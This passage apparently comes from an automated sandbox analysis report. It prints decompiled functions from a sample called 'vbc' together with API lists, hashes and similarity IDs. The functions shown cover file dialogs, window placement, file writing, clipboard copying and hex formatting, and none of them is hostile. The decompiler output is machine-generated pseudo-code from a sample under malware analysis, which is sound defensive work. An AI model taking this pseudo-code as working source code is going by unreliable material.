				_push(_v8);
				L004115D6();
				return E0040FEED( &_v5796);
			}































                                                                                                                                                    0x00410a8a
                                                                                                                                                    0x00410a92
                                                                                                                                                    0x00410a9d
                                                                                                                                                    0x00410aa2
                                                                                                                                                    0x00410aa2
                                                                                                                                                    0x00410aa5
                                                                                                                                                    0x00410aa6
                                                                                                                                                    0x00410aad
                                                                                                                                                    0x00410ab8
                                                                                                                                                    0x00410abd
                                                                                                                                                    0x00410abf
                                                                                                                                                    0x00410ac5
                                                                                                                                                    0x00410acb
                                                                                                                                                    0x00410ad6
                                                                                                                                                    0x00410ae0
                                                                                                                                                    0x00410aeb
                                                                                                                                                    0x00410af0
                                                                                                                                                    0x00410af9
                                                                                                                                                    0x00410aff
                                                                                                                                                    0x00410b08
                                                                                                                                                    0x00410b0b
                                                                                                                                                    0x00410b1c
                                                                                                                                                    0x00410b26
                                                                                                                                                    0x00410b31
                                                                                                                                                    0x00410b34
                                                                                                                                                    0x00410b3a
                                                                                                                                                    0x00410b3d
                                                                                                                                                    0x00410b4d
                                                                                                                                                    0x00410b55
                                                                                                                                                    0x00410b69
                                                                                                                                                    0x00410b71
                                                                                                                                                    0x00410b75
                                                                                                                                                    0x00410b7b
                                                                                                                                                    0x00410b7b
                                                                                                                                                    0x00410b88
                                                                                                                                                    0x00410b88
                                                                                                                                                    0x00410b4d
                                                                                                                                                    0x00410b90
                                                                                                                                                    0x00410b9d
                                                                                                                                                    0x00410baa
                                                                                                                                                    0x00410baa
                                                                                                                                                    0x00410b9d
                                                                                                                                                    0x00410bac
                                                                                                                                                    0x00410baf
                                                                                                                                                    0x00410bc4

                                                                                                                                                    APIs
                                                                                                                                                    • wcslen.MSVCRT ref: 00410A9D
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                                                                                                      • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE1A
                                                                                                                                                      • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE38
                                                                                                                                                      • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE53
                                                                                                                                                      • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE7C
                                                                                                                                                      • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FEA0
                                                                                                                                                    • strlen.MSVCRT ref: 00410B02
                                                                                                                                                      • Part of subcall function 0040FF76: ??3@YAXPAX@Z.MSVCRT ref: 0040FF81
                                                                                                                                                      • Part of subcall function 0040FF76: ??2@YAPAXI@Z.MSVCRT ref: 0040FF90
                                                                                                                                                    • memcpy.MSVCRT ref: 00410B1C
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 577244452-0
                                                                                                                                                    • Opcode ID: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                                                                                                    • Instruction ID: 5b66efc9566b80317fa540751e9ebc59d69584110078b55da7be64cca713082c
                                                                                                                                                    • Opcode Fuzzy Hash: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                                                                                                    • Instruction Fuzzy Hash: 44317672804219AFCF21EFA1C8809EDBBB5AF44314F1440AAE508A3251DB796FC4CF98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040AB54 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040AB54(void* __edi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				void _v1095;
				char _v1096;
				void* __ebx;
				char _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t39;
				void* _t52;
				char _t59;
				char* _t60;
				intOrPtr _t61;

				_v1096 = 0;
				memset( &_v1095, 0, 0x3ff);
				_v8 = 0x747874;
				_t29 = E004078FF(0x1f5);
				_t59 = "*.txt";
				_v72 = _t29;
				_v68 = _t59;
				_v64 = E004078FF(0x1f6);
				_v60 = _t59;
				_v56 = E004078FF(0x1f7);
				_v52 = _t59;
				_t32 = E004078FF(0x1f8);
				_t60 = "*.htm;*.html";
				_v48 = _t32;
				_v44 = _t60;
				_v40 = E004078FF(0x1f9);
				_v36 = _t60;
				_v32 = E004078FF(0x1fa);
				_v28 = "*.xml";
				_t35 = E004078FF(0x1fb);
				_t61 = "*.csv";
				_v24 = _t35;
				_v20 = _t61;
				_v16 = E004078FF(0x1fc);
				_v12 = _t61;
				E0040684D( &_v1096,  &_v72, 8);
				_t52 = 7;
				_t39 = E004078FF(_t52);
				_t23 =  &_v8; // 0x747874
				return E00406680(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
			}































                                                                                                                                                    0x0040ab6d
                                                                                                                                                    0x0040ab74
                                                                                                                                                    0x0040ab81
                                                                                                                                                    0x0040ab88
                                                                                                                                                    0x0040ab8d
                                                                                                                                                    0x0040ab93
                                                                                                                                                    0x0040ab96
                                                                                                                                                    0x0040aba3
                                                                                                                                                    0x0040aba6
                                                                                                                                                    0x0040abaf
                                                                                                                                                    0x0040abb2
                                                                                                                                                    0x0040abb5
                                                                                                                                                    0x0040abba
                                                                                                                                                    0x0040abc4
                                                                                                                                                    0x0040abc7
                                                                                                                                                    0x0040abd0
                                                                                                                                                    0x0040abd3
                                                                                                                                                    0x0040abe0
                                                                                                                                                    0x0040abe3
                                                                                                                                                    0x0040abea
                                                                                                                                                    0x0040abef
                                                                                                                                                    0x0040abf5
                                                                                                                                                    0x0040abf8
                                                                                                                                                    0x0040ac00
                                                                                                                                                    0x0040ac0f
                                                                                                                                                    0x0040ac12
                                                                                                                                                    0x0040ac1b
                                                                                                                                                    0x0040ac1c
                                                                                                                                                    0x0040ac24
                                                                                                                                                    0x0040ac44

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040AB74
                                                                                                                                                      • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                                                                                      • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                                                                                      • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
                                                                                                                                                      • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                                                                                      • Part of subcall function 0040684D: memset.MSVCRT ref: 0040686D
                                                                                                                                                      • Part of subcall function 0040684D: sprintf.MSVCRT ref: 0040689A
                                                                                                                                                      • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068A6
                                                                                                                                                      • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068BB
                                                                                                                                                      • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068C9
                                                                                                                                                      • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068D9
                                                                                                                                                      • Part of subcall function 00406680: GetSaveFileNameA.COMDLG32(?), ref: 004066CF
                                                                                                                                                      • Part of subcall function 00406680: strcpy.MSVCRT(?,?), ref: 004066E6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                    • API String ID: 4021364944-3614832568
                                                                                                                                                    • Opcode ID: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                                                                                                                    • Instruction ID: 4d38638b85bcf07ffefc140bede2392a268d493de89ddae44be4c2da79bd640a
                                                                                                                                                    • Opcode Fuzzy Hash: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                                                                                                                    • Instruction Fuzzy Hash: B62101B2D442589ECB01FF99D8857DDBBB4BB04304F10417BE619B7282D7381A45CB5A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406491 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                    			E00406491(void* __edx, struct HWND__* _a4) {
				int _v8;
				struct tagRECT _v24;
				int _t17;
				void* _t36;
				struct HDC__* _t38;

				_t36 = __edx;
				_t38 = GetDC(0);
				_t17 = GetDeviceCaps(_t38, 8);
				_v8 = GetDeviceCaps(_t38, 0xa);
				ReleaseDC(0, _t38);
				GetWindowRect(_a4,  &_v24);
				asm("cdq");
				asm("cdq");
				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
			}








                                                                                                                                                    0x00406491
                                                                                                                                                    0x004064a8
                                                                                                                                                    0x004064ad
                                                                                                                                                    0x004064b9
                                                                                                                                                    0x004064bc
                                                                                                                                                    0x004064c9
                                                                                                                                                    0x004064e1
                                                                                                                                                    0x004064f5
                                                                                                                                                    0x00406511

                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(00000000), ref: 0040649C
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064AD
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004064B4
                                                                                                                                                    • ReleaseDC.USER32 ref: 004064BC
                                                                                                                                                    • GetWindowRect.USER32 ref: 004064C9
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00406507
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDeviceWindow$MoveRectRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3197862061-0
                                                                                                                                                    • Opcode ID: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                                                                                                    • Instruction ID: 542b186de9fc11de55873c3549d90df3c6ab5362d14aa96611489808ae4c73e2
                                                                                                                                                    • Opcode Fuzzy Hash: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                                                                                                    • Instruction Fuzzy Hash: FC117C31A0011AAFDB009BB9CE4DEEFBFB8EB84711F014165E901E7250D6B0AD01CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00403A8D Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                    			E00403A8D(void* __ecx, void* __eflags, void* _a4, char* _a8) {
				long _v8;
				void _v8199;
				char _v8200;
				void _v24582;
				short _v24584;

				E004118A0(0x6004, __ecx);
				_v24584 = 0;
				memset( &_v24582, 0, 0x3ffe);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}








                                                                                                                                                    0x00403a95
                                                                                                                                                    0x00403aab
                                                                                                                                                    0x00403ab2
                                                                                                                                                    0x00403ac5
                                                                                                                                                    0x00403acb
                                                                                                                                                    0x00403ae2
                                                                                                                                                    0x00403b01
                                                                                                                                                    0x00403b2d

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00403AB2
                                                                                                                                                    • memset.MSVCRT ref: 00403ACB
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AE2
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403B01
                                                                                                                                                    • strlen.MSVCRT ref: 00403B13
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403B24
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1786725549-0
                                                                                                                                                    • Opcode ID: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                                                                                                    • Instruction ID: d8056d974a042835a8b53dd5956248081512f57f3cb7fafeec888b91cb2496ed
                                                                                                                                                    • Opcode Fuzzy Hash: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                                                                                                    • Instruction Fuzzy Hash: 6A1161B244012CBEFB009B94DD85DEB77ADEF08354F0041A6B70AD2091D6349F94CB78
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040AC8A Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040AC8A(void* __eax, void* __ebx) {
				char _v264;
				char _v524;
				void* __edi;
				void* __esi;
				long _t13;
				void* _t18;
				int _t19;
				long _t20;
				void* _t27;
				void* _t31;

				_t27 = __ebx;
				_t31 = __eax;
				_t13 = GetTempPathA(0x104,  &_v524);
				_t32 = _t13;
				if(_t13 == 0) {
					GetWindowsDirectoryA( &_v524, 0x104);
				}
				_v264 = 0;
				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
				_t18 = E0040AC47(_t31, _t32,  &_v264, 2, 1);
				if(_t18 != 0) {
					_t19 = OpenClipboard( *(_t31 + 0x108));
					_t34 = _t19;
					if(_t19 == 0) {
						_t20 = GetLastError();
					} else {
						_t20 = E00405FC6(_t27, 0x104, _t31, _t34,  &_v264);
					}
					if(_t20 != 0) {
						E00405F41(_t20,  *(_t31 + 0x108));
					}
					return DeleteFileA( &_v264);
				}
				return _t18;
			}













                                                                                                                                                    0x0040ac8a
                                                                                                                                                    0x0040ac95
                                                                                                                                                    0x0040aca4
                                                                                                                                                    0x0040acaa
                                                                                                                                                    0x0040acac
                                                                                                                                                    0x0040acb6
                                                                                                                                                    0x0040acb6
                                                                                                                                                    0x0040acd1
                                                                                                                                                    0x0040acd8
                                                                                                                                                    0x0040ace9
                                                                                                                                                    0x0040acf0
                                                                                                                                                    0x0040acf8
                                                                                                                                                    0x0040acfe
                                                                                                                                                    0x0040ad00
                                                                                                                                                    0x0040ad11
                                                                                                                                                    0x0040ad02
                                                                                                                                                    0x0040ad09
                                                                                                                                                    0x0040ad0e
                                                                                                                                                    0x0040ad19
                                                                                                                                                    0x0040ad21
                                                                                                                                                    0x0040ad26
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040ad2e
                                                                                                                                                    0x0040ad37

                                                                                                                                                    APIs
                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040ACA4
                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ACB6
                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,0041341C,00000000,?), ref: 0040ACD8
                                                                                                                                                    • OpenClipboard.USER32(?), ref: 0040ACF8
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040AD11
                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040AD2E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2014771361-0
                                                                                                                                                    • Opcode ID: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                                                                                                    • Instruction ID: 1632bef886f39339d389646b63a05c30f7573d4ca20e624e383ab74febbb07e7
                                                                                                                                                    • Opcode Fuzzy Hash: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                                                                                                    • Instruction Fuzzy Hash: E0118272504318ABDB209B60DD49FDB77BC9F14701F0001B6F689E2091DBB8DAD4CB29
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406585 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 53stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                    			E00406585(char* __edi, intOrPtr _a4, signed int _a8) {
				void _v259;
				char _v260;
				char* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_t37 = _t36 + 0xc;
				 *__edi = 0;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					sprintf( &_v260, "%2.2X");
					_t37 = _t37 + 0xc;
					if(_t35 > 0) {
						strcat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							strcat(_t34, "  ");
						}
					}
					strcat(_t34,  &_v260);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                                                                    0x00406585
                                                                                                                                                    0x0040659d
                                                                                                                                                    0x004065a4
                                                                                                                                                    0x004065a9
                                                                                                                                                    0x004065ac
                                                                                                                                                    0x004065af
                                                                                                                                                    0x004065b1
                                                                                                                                                    0x004065b8
                                                                                                                                                    0x004065c5
                                                                                                                                                    0x004065ca
                                                                                                                                                    0x004065cf
                                                                                                                                                    0x004065d7
                                                                                                                                                    0x004065dd
                                                                                                                                                    0x004065e2
                                                                                                                                                    0x004065e6
                                                                                                                                                    0x004065ec
                                                                                                                                                    0x004065f4
                                                                                                                                                    0x004065fa
                                                                                                                                                    0x004065ec
                                                                                                                                                    0x00406603
                                                                                                                                                    0x00406608
                                                                                                                                                    0x00406610
                                                                                                                                                    0x00406617

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcat$memsetsprintf
                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                    • API String ID: 582077193-791839006
                                                                                                                                                    • Opcode ID: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                                                                                                    • Instruction ID: 9ba21b13147b7bc42f3eaeb5b708c7057566a78b4f06b3a82068ff28b5e275af
                                                                                                                                                    • Opcode Fuzzy Hash: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                                                                                                    • Instruction Fuzzy Hash: 54014C7294421476D7315725ED03BEA379C9B84704F10407FF986A61C5EABCDBD48798
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040FEED Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                    			E0040FEED(intOrPtr* __edi) {
				void* __esi;
				signed int _t9;
				intOrPtr* _t16;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;

				_t16 = __edi;
				_t9 =  *(__edi + 0x1c);
				 *__edi = 0x414288;
				if(_t9 != 0) {
					_push(_t9);
					L004115D6();
					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
				}
				_t18 =  *((intOrPtr*)(_t16 + 0x460));
				if(_t18 != 0) {
					_t9 = E00406B5B(_t18);
					_push(_t18);
					L004115D6();
				}
				_t19 =  *((intOrPtr*)(_t16 + 0x45c));
				if(_t19 != 0) {
					_t9 = E00406B5B(_t19);
					_push(_t19);
					L004115D6();
				}
				_t20 =  *((intOrPtr*)(_t16 + 0x458));
				if(_t20 != 0) {
					_t9 = E00406B5B(_t20);
					_push(_t20);
					L004115D6();
				}
				_t21 =  *((intOrPtr*)(_t16 + 0x454));
				if(_t21 != 0) {
					_t9 = E00406A4E(_t21);
					_push(_t21);
					L004115D6();
				}
				_t22 =  *((intOrPtr*)(_t16 + 0x450));
				if(_t22 != 0) {
					_t9 = E00406A4E(_t22);
					_push(_t22);
					L004115D6();
				}
				return _t9;
			}











                                                                                                                                                    0x0040feed
                                                                                                                                                    0x0040feed
                                                                                                                                                    0x0040fef2
                                                                                                                                                    0x0040fef8
                                                                                                                                                    0x0040fefa
                                                                                                                                                    0x0040fefb
                                                                                                                                                    0x0040ff00
                                                                                                                                                    0x0040ff04
                                                                                                                                                    0x0040ff06
                                                                                                                                                    0x0040ff0e
                                                                                                                                                    0x0040ff10
                                                                                                                                                    0x0040ff15
                                                                                                                                                    0x0040ff16
                                                                                                                                                    0x0040ff1b
                                                                                                                                                    0x0040ff1c
                                                                                                                                                    0x0040ff24
                                                                                                                                                    0x0040ff26
                                                                                                                                                    0x0040ff2b
                                                                                                                                                    0x0040ff2c
                                                                                                                                                    0x0040ff31
                                                                                                                                                    0x0040ff32
                                                                                                                                                    0x0040ff3a
                                                                                                                                                    0x0040ff3c
                                                                                                                                                    0x0040ff41
                                                                                                                                                    0x0040ff42
                                                                                                                                                    0x0040ff47
                                                                                                                                                    0x0040ff48
                                                                                                                                                    0x0040ff50
                                                                                                                                                    0x0040ff52
                                                                                                                                                    0x0040ff57
                                                                                                                                                    0x0040ff58
                                                                                                                                                    0x0040ff5d
                                                                                                                                                    0x0040ff5e
                                                                                                                                                    0x0040ff66
                                                                                                                                                    0x0040ff68
                                                                                                                                                    0x0040ff6d
                                                                                                                                                    0x0040ff6e
                                                                                                                                                    0x0040ff73
                                                                                                                                                    0x0040ff75

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??3@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                    • Opcode ID: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                                                                                                    • Instruction ID: b81094b12df4fb27198692459327ff2c1ceec6e662cd9000025ff3e54110b63d
                                                                                                                                                    • Opcode Fuzzy Hash: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                                                                                                    • Instruction Fuzzy Hash: B0015E72A029322AC5257B26680178AA3557F41B14B06013FFA0577B824F7C799246ED
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040173B Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                                    			E0040173B(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                                                    0x0040174a
                                                                                                                                                    0x00401761
                                                                                                                                                    0x0040176b
                                                                                                                                                    0x00401773
                                                                                                                                                    0x00401774
                                                                                                                                                    0x00401778
                                                                                                                                                    0x0040177d
                                                                                                                                                    0x0040178d
                                                                                                                                                    0x004017a3

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 19018683-0
                                                                                                                                                    • Opcode ID: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                                                                                                                    • Instruction ID: a11a87b208587c0640a8feba78a21dda7633aea5bad1576310b301da0c27fea9
                                                                                                                                                    • Opcode Fuzzy Hash: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                                                                                                                    • Instruction Fuzzy Hash: B6014B72900218FFDF08DFA8DD489FE7BB9FB44301F004469EE11EA194DAB1AA14CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411366 Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                    			E00411366(signed int __edx, void* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v16;
				char _v24;
				char _v116;
				void _v1156;
				char _v1164;
				void _v1171;
				char _v1172;
				char _v2188;
				void _v2195;
				void _v2196;
				void _v3251;
				void _v3252;
				char _v4020;
				void* __edi;
				void* __esi;
				void* _t96;
				char _t105;
				intOrPtr _t112;
				void* _t115;
				signed int _t116;
				int _t121;
				signed int* _t122;
				void* _t124;
				void* _t125;
				signed int _t128;
				signed int* _t129;
				void* _t132;

				_t116 = __edx;
				_t105 = 0;
				_v2196 = 0;
				memset( &_v2195, 0, 0x3ff);
				_v3252 = 0;
				memset( &_v3251, 0, 0x41e);
				_v1172 = 0;
				memset( &_v1171, 0, 0x41e);
				_a8 = E00410E8A(_a8,  &_v2196);
				_t121 = strlen(_a4);
				if(_a8 > 8) {
					_t137 = _t121;
